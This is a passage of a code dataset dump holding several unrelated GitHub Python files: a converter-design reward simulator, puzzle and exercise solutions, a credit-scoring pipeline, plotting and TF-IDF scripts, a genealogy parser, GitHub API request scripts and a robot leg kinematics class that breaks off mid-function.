state):\n # call the file\n # TODO forget to deal with the sweep!\n \"\"\"\n :return: [reward, eff, vout]\n \"\"\"\n if state is not None:\n self.set_state(None, None, state)\n else:\n return [0, -1, -500]\n\n if not self.current.graph_is_valid():\n return [0, -1, -500]\n\n\n hash = self.get_topo_key()\n\n # if not in hash table, call ngspice\n if hash + '$' + str(state.parameters) not in self.graph_2_reward.keys():\n if hash + '$' + str(state.parameters) in self.key_sim_effi_:\n eff = self.key_sim_effi_[hash + '$' + str(state.parameters)][0]\n vout = self.key_sim_effi_[hash + '$' + str(state.parameters)][1]\n effi = {'efficiency': eff, 'output_voltage': vout}\n reward = calculate_reward(effi, self.configs_['target_vout'], self.configs_['min_vout'],\n self.configs_['max_vout'])\n else:\n if self.configs_['skip_sim']:\n reward = 0\n eff = 0\n vout = 500\n else:\n reward, eff, vout, para = super().get_single_topo_sim_result(state)\n\n self.graph_2_reward[hash + '$' + str(state.parameters)] = [reward, eff, vout]\n return reward, eff, vout\n\n else:\n if config.task == 'uct_3_comp' or config.task == 'rs_3_comp':\n return self.graph_2_reward[hash + '$' + str(state.parameters)]\n elif config.task == 'uct_5_comp':\n para, eff, vout = self.graph_2_reward[hash + '$' + str(state.parameters)]\n\n eff_obj = {'efficiency': eff,\n 'output_voltage': vout}\n reward = calculate_reward(eff_obj, self.configs_['target_vout'], self.configs_['min_vout'],\n self.configs_['max_vout'])\n\n return reward, eff, vout\n\n def get_true_reward(self, state=None):\n return self.get_true_performance(state)[0]\n","repo_name":"fanshaoze/UCT-for-Converter-Design","sub_path":"UCTUsingGNN/topo_envs/surrogateRewardSim.py","file_name":"surrogateRewardSim.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"28528930946","text":"import re\nimport numpy as np\n\n\ndef parse_file(fn):\n stack = []\n\n with open(fn, \"r\") as 
f:\n for line in f.readlines():\n if \"[\" in line:\n stack.append([line[i+1] for i in range(0, len(line)-1, 4)])\n\n with open(fn, \"r\") as f:\n search = r\"move (\\d*) from (\\d*) to (\\d*)\"\n instructions = re.findall(search, f.read())\n instructions = [[int(el) for el in inst] for inst in instructions]\n\n return stack, instructions\n\n\nif __name__ == \"__main__\":\n part = \"b\"\n stack, instructions = parse_file(\"day5_input1.txt\")\n\n stack = np.array(stack)\n\n empty_line = np.array([[' '] * stack.shape[1]])\n\n for number, st_from, st_to in instructions:\n temp = []\n for _ in range(number):\n index, el = next(((i, el) for (i, el) in enumerate(stack[:, st_from-1]) if el != ' '))\n temp.append(el)\n stack[index, st_from-1] = ' '\n\n for el in (reversed(temp) if part == \"b\" else temp):\n index = next((i for i, el in enumerate(stack[:, st_to-1]) if el != ' '), None)\n if index == 0:\n stack = np.concatenate((empty_line, stack), axis=0)\n index = 1\n elif index is None:\n index = stack.shape[0]\n stack[index-1, st_to-1] = el\n\n print(stack)\n","repo_name":"roijalbaker/aoc_2022","sub_path":"day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"14979514045","text":"\"\"\"\n Grid Challenge Problem on HackerRank\n Problem Link: https://www.hackerrank.com/challenges/grid-challenge/problem\n\n Author: Shyam Kumar (@svshyam91)\n\n\"\"\"\n\ndef gridChallenge(grid):\n sorted_grid=[]\n l=len(grid[0])\n for strg in grid:\n\n # Sort the string and append it to the list\n sorted_strg=\"\".join(sorted(strg))\n sorted_grid.append(sorted_strg)\n \n for i in range(l):\n st=\"\"\n for strg in sorted_grid:\n st+=strg[i] # Make string from 1st character of every string in grid\n if st != \"\".join(sorted(st)): # Check if the string is sorted\n return \"NO\"\n \n return \"YES\"\n\nif __name__ == '__main__':\n t = int(input())\n\n for t_itr in range(t):\n n = int(input())\n\n grid = []\n\n for _ in range(n):\n grid_item = input()\n grid.append(grid_item)\n\n result = gridChallenge(grid)\n print(result)\n","repo_name":"svshyam91/hacker_rank_solutions","sub_path":"grid_challenge.py","file_name":"grid_challenge.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13906265870","text":"from read_explore_data import read, preview, make_hist\nfrom preprocess import mean_impute, impute_to_value, cat_from_cont, med_impute, log_feature\nfrom models import logistic_reg, splitX_y, create_samples, model_loop, gridsearch_model\nfrom sklearn.cross_validation import train_test_split\nimport numpy as np\n\ndef go():\n #################### Read and explore ####################\n\n df = read('./data/cs-training.csv')\n\n #make_hist(df)\n\n #################### Split, Preprocess, and Impute ####################\n\n dftrain, dftest = create_samples(df, 0.2)\n med = med_impute(dftrain, ['MonthlyIncome'])\n\n #Impute missing monthly income data from the test set to the median of the\n #training set and create log_income. 
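The gridChallenge solution in the record above checks the columns by rebuilding strings index by index; transposing the sorted rows with `zip(*...)` expresses the same check more directly (a sketch, not the record's code):

```python
def grid_challenge(grid):
    rows = ["".join(sorted(row)) for row in grid]                 # sort every row
    ok = all(list(col) == sorted(col) for col in zip(*rows))      # columns non-decreasing
    return "YES" if ok else "NO"

print(grid_challenge(["ebacd", "fghij", "olmkn", "trpqs", "xywuv"]))  # YES
```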
1 added to values to avoid log(0) errors.\n impute_to_value(dftest, 'MonthlyIncome', med)\n log_feature(dftrain, 'MonthlyIncome', offset_zero = 1)\n log_feature(dftest, 'MonthlyIncome', offset_zero = 1)\n #Impute missing numbers of dependents to zero.\n impute_to_value(dftrain, 'NumberOfDependents', 0)\n impute_to_value(dftest, 'NumberOfDependents', 0)\n\n #Bins and labels for debt ratio\n DebtRatioBins = [0, .2, .4, .6, .8, 1, 10, float(\"inf\")]\n DebtRatioLabels = ['<.2', '.2-.4', '.4-.6', '.6-.8', '.8-1', '1-10', '10+']\n #Bins and labels for age\n AgeBins = [0, 20, 30, 40, 50, 60, 70, 80, 150]\n AgeLabels = ['<20', '20-30', '30-40', '40-50', '50-60', '60-70', '70-80', '80+']\n\n #Create dummy variables for categories of debt ratio and age in training and testing set_value\n dftrain1 = cat_from_cont(dftrain, 'DebtRatio', DebtRatioBins, DebtRatioLabels)\n dftrain1 = cat_from_cont(dftrain1, 'age', AgeBins, AgeLabels)\n dftest1 = cat_from_cont(dftest, 'DebtRatio', DebtRatioBins, DebtRatioLabels)\n dftest1 = cat_from_cont(dftest1, 'age', AgeBins, AgeLabels)\n\n #Split training and test sets into x and y\n X_train, y_train = splitX_y(dftrain1, 'SeriousDlqin2yrs')\n X_test, y_test = splitX_y(dftest1, 'SeriousDlqin2yrs')\n\n\n #################### Generate and evaluate models #####################\n\n gridsearch_model(X_train, X_test, y_train, y_test, ['DT'], 'modelComparisonDT.png')#KNN', 'DT', 'SGD', 'LR', 'NB', 'AB', 'RF', 'GB'])\n\nif __name__ == \"__main__\":\n go()\n","repo_name":"lmcindewar/CAPP30254-lmcindewar","sub_path":"Assignment3/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5790802108","text":"import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nsns.set_style(\"ticks\")\nsns.set_style({\"xtick.direction\": \"in\", \"ytick.direction\": \"in\"})\nmatplotlib.rcParams.update({\"font.size\": 14})\nmatplotlib.rcParams.update({\"axes.labelsize\": 16})\nmatplotlib.rcParams.update({\"legend.fontsize\": 16})\nmatplotlib.rcParams.update({\"xtick.labelsize\": 16, \"ytick.labelsize\": 16})\n# pd.options.display.float_format = '{:,.6f}'.format\n# cmap = plt.get_cmap(\"Dark2\")\n# cmap = plt.get_cmap('tab10')\n\nstrain_name_df = pd.read_excel(\"./data/strain_num_matching.xlsx\", index_col=0)\nnum_days = 27\nstart_day = 1\n# remove the first day from the trajectory data\nt = np.linspace(start_day, num_days, num_days - start_day + 1)\n\nstress_list = [\"TET\", \"KM\", \"NFLX\", \"SS\", \"PLM\", \"NQO\", \"SDC\", \"MMC\"]\nevo192_res = pd.read_excel(\"./data/192evo_ic50.xlsx\", index_col=0, skiprows=1)\nparent_ic50 = pd.read_excel(\"./data/192evo_parent_ic50.xlsx\", index_col=1, skiprows=1)[\n \"Parent mean IC50 [log2(μg/mL)]\"\n]\n\n# choose the strains to plot by defining start_strain & num_strains\nstart_strain = 1\nnum_strains = 4\n\n\ndef plot_time_series(\n strain,\n stress,\n color,\n start_day=start_day,\n zorder=1,\n alpha=0.15,\n marker=\".\",\n i=None,\n print_title=True,\n label=None,\n):\n \"\"\"\n plot resistance for 'strain'\n strain: corresponds to strain_num for each trajectory file.\n stress: which stress resistance you want to plot.\n start_day: day to start the trajectory\n color, zorder, alpha, marker: args for plt.plot()\n i:\n \"\"\"\n\n title = strain_name_df.iloc[strain - 1][0]\n df = pd.read_csv(\"./data/trajectories/strain\" + str(strain) + \".csv\", index_col=0)\n 
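pipeline.py above imports `cat_from_cont(df, col, bins, labels)` from a `preprocess` module that is not included in the record. A plausible minimal implementation, assuming it bins a continuous column and expands the bins into dummy variables; the pandas-based body is a guess, only the signature comes from the record:

```python
import pandas as pd

def cat_from_cont(df, col, bins, labels):
    cats = pd.cut(df[col], bins=bins, labels=labels)     # bin the column
    dummies = pd.get_dummies(cats, prefix=col)           # one column per bin
    return pd.concat([df.drop(columns=[col]), dummies], axis=1)

df = pd.DataFrame({"age": [17, 25, 43, 61, 85]})
print(cat_from_cont(df, "age",
                    bins=[0, 20, 30, 40, 50, 60, 70, 80, 150],
                    labels=["<20", "20-30", "30-40", "40-50",
                            "50-60", "60-70", "70-80", "80+"]))
```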
trajectory = df.loc[stress]\n if strain == 26:\n # because strain26 died at day 15\n traj_len = trajectory.shape[0]\n plt.plot(\n np.linspace(start_day, traj_len, traj_len - start_day + 1),\n trajectory.iloc[start_day - 1 :],\n color=color,\n alpha=alpha,\n zorder=zorder,\n marker=marker,\n label=label,\n )\n else:\n plt.plot(\n t,\n trajectory.iloc[start_day - 1 :],\n color=color,\n alpha=alpha,\n zorder=zorder,\n marker=marker,\n label=label,\n )\n if i == 0 and print_title:\n plt.title(title, fontsize=15)\n\n\ndef plot_strain(\n strain_num_start,\n strain_num_end,\n stress1,\n stress2,\n strain_label,\n roll_win=None,\n cmap_name=None,\n cmap_level=6,\n):\n for strain in range(strain_num_start, strain_num_end + 1):\n # parent strains in TET\n if cmap_name is not None:\n # cmap2 = plt.get_cmap(cmap_name, cmap_level)\n cmap2 = sns.color_palette(cmap_name, cmap_level)\n df = pd.read_csv(\n \"./data/trajectories/strain\" + str(strain) + \".csv\", index_col=0\n )\n trajectory1 = df.loc[stress1]\n trajectory2 = df.loc[stress2]\n if roll_win is not None:\n trajectory1 = trajectory1.T.rolling(\n roll_win, min_periods=1, win_type=\"triang\"\n ).mean()\n trajectory2 = trajectory2.T.rolling(\n roll_win, min_periods=1, win_type=\"triang\"\n ).mean()\n if strain == strain_num_end:\n plt.plot(\n trajectory1.values,\n trajectory2.values,\n \".-\",\n lw=0.9,\n markersize=4.8,\n color=cmap2[strain - strain_num_start + 2],\n label=strain_label,\n zorder=3,\n )\n else:\n plt.plot(\n trajectory1.values,\n trajectory2.values,\n \".-\",\n lw=0.9,\n markersize=4.8,\n color=cmap2[strain - strain_num_start + 2],\n zorder=3,\n )\n plt.scatter(trajectory1[0], trajectory2[0], color=\"k\", alpha=1, zorder=1, s=32)\n plt.scatter(trajectory1[-1], trajectory2[-1], color=\"gray\", alpha=1, zorder=1, s=25)\n plt.xlabel(stress1 + \" resistance\")\n plt.ylabel(stress2 + \" resistance\")\n","repo_name":"jiwasawa/resistance-landscape","sub_path":"src/time_series_generation.py","file_name":"time_series_generation.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36947756701","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nbusi_revi = pd.read_csv(\"busi_revi.csv\")\n\n\ndef join_(lst):\n return \" \".join(lst)\n\n\nbusi_revi['text'] = busi_revi['text'].apply(eval).apply(join_)\n\n\ndef tfidf(corpus):\n vectorizer = CountVectorizer(min_df=20)\n transformer = TfidfTransformer()\n tfidf = transformer.fit_transform(vectorizer.fit_transform(corpus))\n word = vectorizer.get_feature_names()\n weight = tfidf.toarray().sum(axis=0)\n\n tfidf_Ser = pd.Series(weight, index=word).sort_values(ascending=False)\n return tfidf_Ser\n","repo_name":"xiaowei-zhu/STAT628-Module3","sub_path":"code/preliminary analysis/tf-idf.py","file_name":"tf-idf.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40101095748","text":"import datetime\r\n\r\ndef individualList():\r\n output_list = [0 for i in range(7)]\r\n output_list[5] = []\r\n return output_list\r\ndef getLastName(str):\r\n lastName=''\r\n for i in str:\r\n if(i != '/'):\r\n lastName += i\r\n return lastName\r\n\r\ndef familyList():\r\n output_list = [0 for i in range(6)]\r\n output_list[5] = []\r\n return output_list\r\n\r\ndef getNameByID(list_individual, id):\r\n for i in 
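The tf-idf.py record above pairs CountVectorizer with TfidfTransformer and calls `vectorizer.get_feature_names()`, which scikit-learn deprecated in 1.0 and removed in 1.2 in favour of `get_feature_names_out()`. An equivalent one-step sketch with TfidfVectorizer; the two-document corpus is invented and `min_df` is parameterised so the toy corpus survives the cutoff:

```python
import pandas as pd
from sklearn.feature_extraction.text import TfidfVectorizer

def tfidf(corpus, min_df=1):
    vectorizer = TfidfVectorizer(min_df=min_df)
    weights = vectorizer.fit_transform(corpus).toarray().sum(axis=0)
    words = vectorizer.get_feature_names_out()    # replaces get_feature_names()
    return pd.Series(weights, index=words).sort_values(ascending=False)

print(tfidf(["good pizza great service", "bad pizza slow service"]))
```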
list_individual:\r\n if(i[0] == id):\r\n return i[1]\r\n \r\ndef getDeathDateByID(list_individual, id):\r\n for i in list_individual:\r\n if(i[0] == id):\r\n if(i[4] != 0):\r\n return i[4]\r\n \r\ndef dateFormatConversion(date):\r\n m = date.split()\r\n if(m[1] == 'JAN'): m[1] = '01';\r\n if(m[1] == 'FEB'): m[1] = '02';\r\n if(m[1] == 'MAR'): m[1] = '03';\r\n if(m[1] == 'APR'): m[1] = '04';\r\n if(m[1] == 'MAY'): m[1] = '05';\r\n if(m[1] == 'JUN'): m[1] = '06';\r\n if(m[1] == 'JUL'): m[1] = '07';\r\n if(m[1] == 'AUG'): m[1] = '08';\r\n if(m[1] == 'SEP'): m[1] = '09';\r\n if(m[1] == 'OCT'): m[1] = '10';\r\n if(m[1] == 'NOV'): m[1] = '11';\r\n if(m[1] == 'DEC'): m[1] = '12';\r\n if(m[2] in ['1', '2', '3', '4', '5', '6', '7', '8', '9']):\r\n m[2] = '0' + m[2]\r\n return (m[0] + '-' + m[1] + '-' + m[2])\r\n \r\ndef deceasedList(list_individual):\r\n deceasedList = []\r\n for individual in list_individual:\r\n if individual[4] is not 0:\r\n deceasedList.append(individual[0])\r\n print(\"User Story 29: Deceased individuals list is as follows : \", deceasedList)\r\n for i in deceasedList:\r\n print(\"Individual with ID \" + i + \" and name \" + getNameByID(list_individual, i) + \" passed away on \" + getDeathDateByID(list_individual, i))\r\n \r\ndef toParse(gedFileName):\r\n f = open(gedFileName,'r')\r\n list_individual = []\r\n list_family = []\r\n indi_on = 0\r\n fam_on = 0\r\n individual = individualList()\r\n family = familyList()\r\n for line in f:\r\n str = line.split()\r\n if(str != []):\r\n if(str[0] == '0'):\r\n if(fam_on == 1):\r\n list_family.append(family)\r\n family = familyList()\r\n fam_on = 0\r\n if(indi_on == 1):\r\n list_individual.append(individual)\r\n individual = individualList()\r\n indi_on = 0 \r\n if(str[1] in ['NOTE', 'HEAD', 'TRLR']):\r\n pass\r\n else:\r\n if(str[2] == 'INDI'):\r\n indi_on = 1\r\n individual[0] = (str[1])\r\n if(str[2] == 'FAM'):\r\n fam_on = 1\r\n family[0] = (str[1])\r\n if(str[0] == '1'):\r\n if(str[1] == 'NAME'):\r\n individual[1] = str[2] + \" \" + getLastName(str[3])\r\n if(str[1] == 'SEX'):\r\n individual[2] = str[2]\r\n if(str[1] == 'FAMS'):\r\n individual[5].append(str[2])\r\n if(str[1] == 'FAMC'):\r\n individual[6] = str[2]\r\n if(str[1] == 'HUSB'):\r\n family[1] = str[2]\r\n if(str[1] == 'WIFE'):\r\n family[2] = str[2]\r\n if(str[1] == 'CHIL'):\r\n family[5].append(str[2])\r\n if(str[1] in ['BIRT', 'DEAT', 'MARR', 'DIV']):\r\n date_id = str[1] \r\n if(str[0] == '2'):\r\n if(str[1] == 'DATE'):\r\n date = str[4] + \" \" + str[3] + \" \" + str[2]\r\n if(date_id == 'MARR'):\r\n family[3] = dateFormatConversion(date)\r\n if(date_id == 'DIV'):\r\n family[4] = dateFormatConversion(date)\r\n if(date_id == 'BIRT'):\r\n individual[3] = dateFormatConversion(date)\r\n if(date_id == 'DEAT'):\r\n individual[4] = dateFormatConversion(date)\r\n \r\n return list_individual,list_family\r\n\r\ndef main(gedFileName):\r\n list_individual, list_family= toParse(gedFileName)\r\n list_individual.sort()\r\n list_family.sort()\r\n deceasedList(list_individual)\r\n\r\nmain('D:/SSW-555/Week 5/Akanksha_Homework 4/Homework 4/akankshaGedcom.ged')\r\n","repo_name":"salonikalsekar/CS555-SSW555_agileMethodologies","sub_path":"userStory29.py","file_name":"userStory29.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11538595167","text":"#!/usr/bin/env python3\n\"\"\"Sends a GET request with authentication token to the GitHub to pull a specific repo.\n Prints response status 
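`dateFormatConversion` in the userStory29.py record above maps the month abbreviations by hand; `datetime.strptime` can do the same conversion in one call. A sketch assuming an English locale, since `%b` matches locale month abbreviations (case-insensitively):

```python
from datetime import datetime

def date_format_conversion(date):                 # date like "1990 JAN 2"
    return datetime.strptime(date, "%Y %b %d").strftime("%Y-%m-%d")

print(date_format_conversion("1990 JAN 2"))       # 1990-01-02
```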
code, verifies some repo fields.\"\"\"\nfrom pprint import pprint\n\nimport requests\n\nfrom my_utils import get_data_from_file, get_github_api_headers, validate_records\n\n\ndef get_created_repo(url_, validation_data):\n \"\"\"Sends a GET request with private auth token to `url_`, prints response code.\n Verifies certain values of the fields from `data` dict.\"\"\"\n token = get_data_from_file(\"secrets/github_token\")\n\n response = requests.get(\n url_,\n headers=get_github_api_headers(token),\n timeout=(2, 5)\n )\n\n status_code = response.status_code\n print(f\"Response status code: {status_code}\")\n\n if response:\n repository_data = response.json()\n mismatches = validate_records(validation_data, repository_data)\n if mismatches:\n pprint(mismatches)\n raise AssertionError\n else:\n print(\"An error has occurred!\")\n\n\nif __name__ == \"__main__\":\n v_data = {\"owner\": {\"login\": \"ehnat0n\", \"id\": 539144290}, \"name\": \"repo-created-with-api\",\n \"id\": 7249605570, \"has_wiki\": False, \"private\": True}\n\n OWNER = v_data[\"owner\"][\"login\"]\n REPO = v_data[\"name\"]\n\n url = f\"https://api.github.com/repos/{OWNER}/{REPO}\"\n\n get_created_repo(url, v_data)\n","repo_name":"ehnat0n/webdrivercamp-learning-api","sub_path":"requests/3_get_created_repo.py","file_name":"3_get_created_repo.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35653038184","text":"import os\nimport requests\nfrom flask import Blueprint, jsonify\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nmy_secret = os.getenv('MY_SECRET')\n\ntop_contributors = Blueprint('top_contributors', __name__)\n\n@top_contributors.route('/api/contributors', methods=['GET'])\ndef get_top_contributors():\n headers = {'Authorization': f'token {os.getenv(\"MY_SECRET\")}'}\n response = requests.get('https://api.github.com/search/repositories?q=stars:%3E1&sort=stars&order=desc', headers=headers)\n repos = response.json()['items']\n\n # A list to store top contributors\n contributors = []\n \n for repo in repos:\n owner = repo['owner']['login']\n repo_name = repo['name']\n response = requests.get(f'https://api.github.com/repos/{owner}/{repo_name}/contributors', headers=headers)\n print(response.json())\n print(response.headers['X-RateLimit-Remaining'])\n repo_contributors = response.json()\n if isinstance(repo_contributors, list) and len(repo_contributors) > 0:\n contributors.append(repo_contributors[0])\n \n return jsonify(contributors)\n","repo_name":"glendonC/ossPulse","sub_path":"osspulse/backend/api/top_contributors.py","file_name":"top_contributors.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25550842782","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#Aufgabe 1\n\n#a\n\nA = np.array([[1,2,1],[-1,2,-3],[0,1,-2]])\n\ndef frobenius_norm(A):\n return np.sqrt(np.sum(A*A))\n\nprint(\"a.)\",frobenius_norm(A))\n\n#b \ndef info(A):\n return (np.min(A),np.mean(A),np.max(A))\n\nprint(\"b.)\",info(A))\n\n#c\ndef maximum_norm(A):\n return np.max(np.sum(np.abs(A), axis=1))\n\nprint(\"c.)\",maximum_norm(A))\n\n#d\ndef upper3(d,u1,u2,N):\n if N>=2:\n return d*np.eye(N)+u1*np.eye(N,N,1)+u2*np.eye(N,N,2)\n else:\n print(\"Die Dimension muss mindestens 2 sein\")\n \nprint(\"d.)\",upper3(1,2,3,7))\n\n#e\ndef insert(B, start_row, start_col, A):\n M, N = B.shape\n I, J = A.shape\n\n #Überprüfung ob die Matrix 
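Both GitHub records above authenticate with a `token ...` Authorization header, and top_contributors.py also reads the `X-RateLimit-Remaining` response header. A minimal combined sketch; the URL placeholders and `<TOKEN>` are not real values:

```python
import requests

def github_get(url, token, timeout=(2, 5)):
    response = requests.get(
        url,
        headers={
            "Authorization": f"token {token}",
            "Accept": "application/vnd.github+json",
        },
        timeout=timeout,
    )
    print("status:", response.status_code,
          "| rate limit remaining:", response.headers.get("X-RateLimit-Remaining"))
    response.raise_for_status()
    return response.json()

# repo = github_get("https://api.github.com/repos/<OWNER>/<REPO>", "<TOKEN>")
```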
B die richtige Dimension hat\n if not(M <= I - start_row and N <= J - start_col):\n print(\"Die Dimension von B ist nicht gültig\")\n\n A[start_row:start_row+M, start_col:start_col+N] = B\n return A\n\nB = np.array([[1, 0],\n [0, 3],\n [0, 1]])\n\nA = np.ones((5,5))\nstart_row = 1\nstart_col = 3\n\nresult = insert(B, start_row, start_col, A)\nprint(\"e.)\",result)","repo_name":"tobibrosch/mathematischeprogrammierung","sub_path":"Gruppenphase/Blatt06/nowakbrosch_Blatt06_1.py","file_name":"nowakbrosch_Blatt06_1.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35938955658","text":"\"\"\" #Crie uma lista com 10 números quaisquer:\n\n\nlist_number = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n# a. uma lista com os 4 primeiros números\n\nfirst_four = list_number[:4]\n\n# b. uma lista com os 5 últimos números\nlast_five = list_number[5:]\n\n# c. uma lista contendo apenas os elementos das posições pares\neven_positions = list_number[1::2]\n\n# d. uma lista contendo apenas os elementos das posições ímpares\nodd_positions = list_number[0::2]\n\n# e. a lista inversa da lista sorteada (isto é, uma lista que começa com o último elemento da lista sorteada e termina com o primeiro)\nreversed_list = list_number[::-1]\n\n# f. uma lista inversa dos 5 primeiros números\nreversed_first_five = list_number[4::-1]\n\n# g. uma lista inversa dos 5 últimos números.\nreversed_last_five= list_number[:5][::-1]\n\n\"\"\"\nnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n# a. Uma lista com os primeiros 4 números\nfirst_four = []\nfor i in range(4):\n first_four.append(numbers[i])\n\n# b. Uma lista com os últimos 5 números\nlast_five = []\nfor i in range(len(numbers) - 5, len(numbers)):\n last_five.append(numbers[i])\n\n# c. Uma lista contendo apenas os elementos em posições pares\neven_positions = []\nfor i in range(1, len(numbers), 2):\n even_positions.append(numbers[i])\n\n# d. Uma lista contendo apenas os elementos em posições ímpares\nodd_positions = []\nfor i in range(0, len(numbers), 2):\n odd_positions.append(numbers[i])\n\n# e. A lista reversa da lista original\nreversed_list = []\nfor i in range(len(numbers) - 1, -1, -1):\n reversed_list.append(numbers[i])\n\n# f.Uma lista reversa dos primeiros 5 números\nreversed_first_five = []\nfor i in range(4, -1, -1):\n reversed_first_five.append(numbers[i])\n\n# g. Uma lista reversa dos últimos 5 números\nreversed_last_five = []\nfor i in range(len(numbers) - 1, len(numbers) - 6, -1):\n reversed_last_five.append(numbers[i])\n\nprint(\"a. First four numbers:\", first_four)\nprint(\"b. Last five numbers:\", last_five)\nprint(\"c. Elements at even positions:\", even_positions)\nprint(\"d. Elements at odd positions:\", odd_positions)\nprint(\"e. Reversed list:\", reversed_list)\nprint(\"f. Reversed first five numbers:\", reversed_first_five)\nprint(\"g. 
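The hand-rolled norms in the nowakbrosch_Blatt06_1.py record above can be cross-checked against numpy's built-ins: `np.linalg.norm(A)` is the Frobenius norm for a 2-D array, and `np.linalg.norm(A, np.inf)` is the maximum (row-sum) norm. A quick verification on the record's own matrix:

```python
import numpy as np

A = np.array([[1, 2, 1], [-1, 2, -3], [0, 1, -2]])
print(np.isclose(np.sqrt(np.sum(A * A)), np.linalg.norm(A)))                     # True
print(np.isclose(np.max(np.sum(np.abs(A), axis=1)), np.linalg.norm(A, np.inf)))  # True
```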
Reversed last five numbers:\", reversed_last_five)\n\n\n\n\n\n\n\n","repo_name":"claraferreirabatista/Ada","sub_path":"CodingTank/atividade4/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73652420349","text":"# 给你一个下标从 0 开始的正整数数组 nums 。请你找出并统计满足下述条件的三元组 (i, j, k) 的数目:\n\n# 0 <= i < j < k < nums.length\n# nums[i]、nums[j] 和 nums[k] 两两不同 。\n# 换句话说:nums[i] != nums[j]、nums[i] != nums[k] 且 nums[j] != nums[k] 。\n# 返回满足上述条件三元组的数目。\n\n\n\nclass Solution(object):\n def unequalTriplets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n n = len(nums)\n ans = 0\n for i in range(n):\n for j in range(i + 1, n):\n for k in range(j + 1, n):\n if nums[i] != nums[j] and nums[j] != nums[k] and nums[i] != nums[k]:\n ans += 1\n\n return ans\n\n\nnums = [4,4,2,4,3]\n\na = Solution()\nprint(a.unequalTriplets(nums))","repo_name":"xxxxlc/leetcode","sub_path":"competition/单周赛/320/unequalTriplets.py","file_name":"unequalTriplets.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41054504495","text":"import numpy as np\nfrom DRIVE.jointdrive_edit import *\n\nclass Leg:\n\n # a -> Laengenmaße (in m)\n # b -> Offset [x_B, y_B] (in m)\n # r -> Rotationswinkel (in rad)\n # m -> Motorobjekte\n # n -> Nullwinkel der Motoren\n def __init__(self, a=[1, 1, 1, 1, 1, 1, 1], b=[0, 0], r=0, m=[0, 0, 0], n=[0, 0, 0]):\n self.a = [a[0], a[1], a[2], a[3], a[4], a[5], a[6]]\n self.offset = [b[0], b[1]]\n self.rotation = r\n\n self.lc = self.a[2]\n self.lcSquare = math.pow(self.lc, 2)\n self.lf = math.sqrt(math.pow(self.a[3], 2) + math.pow(self.a[4], 2))\n self.lfSquare = math.pow(self.lf, 2)\n self.lt = math.sqrt(math.pow(self.a[5], 2) + math.pow(self.a[6], 2))\n self.ltSquare = math.pow(self.lt, 2)\n self.servoOffset = [math.cos(self.rotation) * self.a[0], math.sin(self.rotation) * self.a[0], -self.a[1], 0]\n\n # für Geschwindigkeitsberechnung\n self.lastPosition = [0, 0, 0]\n\n self.turnOffset = [n[0], n[1], n[2]]\n servoA = JointDrive(m[0], aOffset=self.turnOffset[0], ccw=False, prt=True, aMax=math.radians(120), aMin=math.radians(-120))\n servoB = JointDrive(m[1], aOffset=self.turnOffset[1], ccw=True, prt=True, aMax=math.radians(120), aMin=math.radians(-120))\n servoC = JointDrive(m[2], aOffset=self.turnOffset[2], ccw=False, prt=True, aMax=math.radians(120), aMin=math.radians(-120))\n self.motors = [servoA, servoB, servoC]\n\n self.motorAngles = [self.motors[0].getCurrentJointAngle(), self.motors[1].getCurrentJointAngle(), self.motors[2].getCurrentJointAngle()]\n\n # Vorgegebene Methoden\n def forKinAlphaJoint(self, alpha, beta, gamma):\n pos = [0, 0, 0, 1]\n pos[0] = math.cos(alpha) * (self.lt * math.cos(beta + gamma) + self.lf * math.cos(beta) + self.lc)\n pos[1] = math.sin(alpha) * (self.lt * math.cos(beta + gamma) + self.lf * math.cos(beta) + self.lc)\n pos[2] = self.lt * math.sin(beta + gamma) + self.lf * math.sin(beta)\n return pos\n\n def invKinAlphaJoint(self, pos=[0, 0, 0, 1]):\n alpha = math.atan2(pos[1], pos[0])\n footPos = np.array(pos)\n A1 = np.array([\n [math.cos(alpha), 0, math.sin(alpha), self.lc * math.cos(alpha)],\n [math.sin(alpha), 0, -math.cos(alpha), self.lc * math.sin(alpha)],\n [0, 1, 0, 0],\n [0, 0, 0, 1]])\n betaPos = np.dot(A1, np.transpose([0, 0, 0, 1]))\n lct = np.linalg.norm(footPos[0:3] - betaPos[0:3])\n lctSquare = math.pow(lct, 2)\n gamma = 
